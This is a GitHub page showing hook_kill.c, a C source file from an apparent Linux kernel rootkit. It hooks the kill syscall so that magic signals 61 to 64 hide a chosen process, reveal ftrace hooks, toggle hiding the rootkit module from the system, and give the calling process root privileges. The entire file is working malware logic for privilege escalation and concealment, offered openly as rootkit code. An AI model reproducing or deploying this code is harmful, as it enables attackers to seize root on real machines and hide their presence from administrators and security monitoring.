-
Notifications
You must be signed in to change notification settings - Fork 2
/
hook_kill.c
48 lines (46 loc) · 1.34 KB
/
hook_kill.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
//
// Created by sciver on 10/17/22.
//
#include "hook_kill.h"
#include "hide_module.h"
#include "setroot.h"
#include "reveal_ftrace.h"
#include "hide_process.h"
asmlinkage long (*orig_kill)(const struct pt_regs *);
asmlinkage int hook_kill(const struct pt_regs *regs)
{
int sig = regs->si;
int pid = regs->di;
switch (sig) {
case 61:
/* If we receive the magic signal, then we just sprintf the pid
* from the intercepted arguments into the hide_pid string */
printk(KERN_INFO "rootkit: hiding process with pid %d\n", pid);
sprintf(hide_pid, "%d", pid);
return 0;
break;
case 62:
printk(KERN_INFO "rootkit: reavealing ftrace!\n");
reveal_ftrace();
return 0;
break;
case 63:
if (hidden == 0) {
printk(KERN_INFO "rootkit: hiding rootkit!\n");
hideme();
hidden = 1;
} else if (hidden == 1) {
printk(KERN_INFO "rootkit: revealing rootkit!\n");
showme();
hidden = 0;
}
return 0;
break;
case 64:
printk(KERN_INFO "rootkit: giving root...\n");
set_root();
return 0;
break;
}
return orig_kill(regs);
}